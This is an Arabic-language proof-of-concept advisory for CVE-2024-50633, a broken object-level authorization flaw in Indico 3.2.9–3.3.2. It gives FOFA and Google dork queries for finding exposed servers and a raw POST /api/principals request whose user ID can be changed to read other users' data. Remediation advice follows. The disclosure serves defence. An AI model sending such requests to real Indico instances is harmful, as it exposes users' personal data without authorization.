
إثبات مفهوم لاستغلال ثغرة CVE-2024-50633، وهي ثغرة من نوع Broken Object Level Authorization (BOLA) في Indico v3.2.9–v3.3.2، تتيح الوصول غير المصرح به إلى بيانات المستخدم الحساسة عبر طلبات API مصممة خصيصًا.
(تم اكتشاف وإبلاغ ثغرة BOLA في Indico.)
ثغرة تفويض مستوى الكائن المكسور (BOLA) في Indico الإصدار 3.2.9 تسمح للمهاجمين بالوصول إلى معلومات حساسة للمستخدم عن طريق التلاعب بطلبات API.
FOFA : title="Indico" || header="Indico"
Google Dork : intitle:"Indico" inurl:"/event"
/api/principalsPOST /api/principals HTTP/2
Content-Type: application/json
{
"values": ["User:2301"]
}
بتعديل قيمة المستخدم (مثلاً User:2302)، يمكن للمهاجم الوصول إلى بيانات مستخدم آخر.
خطوات إعادة الإنتاج:
values إلى معرف مستخدم آخر.🔥 التأثير يمكن لهذه الثغرة كشف معلومات حساسة لمستخدمين آخرين. إنها تخترق حدود التخويل، مما يؤدي إلى تسريبات بيانات محتملة.
⚙️ الإصدارات المتأثرة Indico v3.2.9 إلى v3.3.2
🔧 كيفية الإصلاح؟ لـ [CVE-2024-50633]
التحديث إلى أحدث إصدار: تأكد من تحديث مثيل Indico الخاص بك إلى أحدث إصدار مصحح حيث تم معالجة الثغرة. تحقق من الإصدارات الرسمية لـ Indico للحصول على التحديثات.
تقييد الوصول إلى نقاط النهاية الحساسة: طبق ضوابط وصول صارمة على نقاط نهاية API مثل /api/principals لضمان أن المستخدمين المصرح لهم فقط يمكنهم الوصول إلى المعلومات الحساسة. استخدم آليات التحكم في الوصول القائم على الأدوار (RBAC).
تنفيذ التحقق من الإدخال: تحقق من صحة الإدخال المقدم من المستخدم وقم بتعقيمه في جميع طلبات API لمنع الوصول غير المصرح به أو التلاعب بالبيانات.
مراقبة وتدقيق السجلات: راقب سجلات الخادم بانتظام بحثًا عن طلبات API غير عادية أو محاولات وصول غير مصرح بها إلى /api/principals. يمكن أن يساعد ذلك في تحديد محاولات الاستغلال.
استخدام جدار حماية تطبيقات الويب (WAF): يمكن لنشر WAF توفير طبقة إضافية من الحماية ضد محاولات الاستغلال عن طريق اكتشاف الطلبات الضارة وحظرها.
🕵️♂️ تم الإبلاغ بواسطة Çetin BİNİCİ